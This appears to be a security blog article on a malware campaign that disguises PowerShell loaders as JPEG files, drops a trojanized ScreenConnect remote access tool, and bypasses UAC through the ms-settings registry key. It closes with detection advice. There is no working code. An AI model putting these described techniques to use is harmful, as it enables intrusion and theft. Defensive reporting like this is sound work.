Operation SilentCanvas: When JPEGs Become Trojan Horses
That innocent “sysupdate.jpeg” in your downloads folder may not be a photo at all. In Operation SilentCanvas, attackers are disguising malicious PowerShell scripts as JPEG image files to evade basic Windows security checks. These so‑called JPEG trojan malware samples lack proper JPEG headers, meaning they are not real images, but they still appear convincing enough to fool users and some automated defenses. Once opened or executed, the fake image acts as a loader, triggering a remote access trojan installation and giving attackers a foothold on the victim’s system. Because users inherently trust common formats like JPEG, malicious image files are an effective social‑engineering tool. This Windows security bypass technique is part of a broader trend where attackers abuse everyday file types to sneak dangerous payloads onto PCs while keeping traditional antivirus tools blind.
How Fake JPEGs Launch PowerShell and Remote Access Trojans
Operation SilentCanvas uses a multi‑stage attack chain that blends scripting, living‑off‑the‑land techniques, and dual‑format exploitation. The disguised JPEG is actually a PowerShell script, sometimes paired with file extension spoofing so it appears to be a normal image. When executed, it creates a hidden C:\Systems folder and downloads a trojanized ScreenConnect package from a remote server over encrypted TCP port 5443. This remote access trojan is dropped into C:\ProgramData\OneDriveServer\, where it abuses a legitimate remote management tool to monitor screens, capture keystrokes, access microphones and cameras, and steal clipboard contents and files. A secondary “access.jpeg” payload then runs fully in memory, bypassing many disk‑based antivirus signatures. By chaining these steps, attackers gain persistent, stealthy control without relying on obvious binaries that security products typically monitor.
Windows Security Bypass Through Registry Hijacking and Dual Formats
To silently escalate privileges, Operation SilentCanvas goes beyond simple scripting tricks. The malware hijacks the ms-settings registry key to launch ComputerDefaults.exe, a trusted Windows binary, effectively bypassing User Account Control (UAC) without user awareness. Within about two seconds, the registry key deletes itself, erasing traces of this Windows security bypass. At the same time, attackers exploit dual‑format and extension spoofing: a file may look like a .jpeg but behave like a script when handled by the right interpreter. Because many defenses still rely heavily on file signatures and extensions, this dual‑format exploitation lets malicious image files slip past filters that only scan for obvious executable types. The result is a remote access trojan deployment that appears to originate from harmless media files, making investigation and incident response more difficult for everyday users and even some security teams.
Phishing Lures: Fake Notices and Software Updates
The technical tricks of Operation SilentCanvas would be useless without effective delivery. Attackers primarily rely on phishing emails to place these JPEG trojan malware files on victims’ systems. Common lures include messages impersonating Social Security Administration notifications and bogus software update prompts, both designed to pressure users into quickly opening attachments. The weaponized JPEG or update file arrives as part of these emails, often accompanied by convincing branding and formal language to lower suspicion. This campaign also aligns with broader trends like ClickFix, where attackers hide shellcode inside PNG images on fake Windows Update pages using steganography. In all cases, the goal is the same: use trusted visuals and familiar update scenarios to trick recipients into executing malicious image files. Once that happens, the remote access trojan chain begins, often without any obvious visual sign that something went wrong.
How to Detect and Prevent Malicious Image Files
Protecting yourself from Operation SilentCanvas and similar campaigns requires a mix of technical controls and careful habits. On the technical side, enable PowerShell logging and monitor for scripts launched from unexpected locations or file types, especially anything masquerading as JPEGs. Use application whitelisting to block abuse of system binaries such as csc.exe and ComputerDefaults.exe, and tightly control the use of remote management tools like ScreenConnect in your environment. On the user side, treat unsolicited attachments and update prompts with skepticism, particularly if they claim to be urgent notices or system fixes. Avoid double‑clicking files directly from email; instead, save and scan them with up‑to‑date security tools. Regularly check for suspicious directories like C:\Systems and C:\ProgramData\OneDriveServer\, and if you suspect exposure, reset stored credentials, review remote access software, and perform a full system scan to root out any lingering remote access trojan components.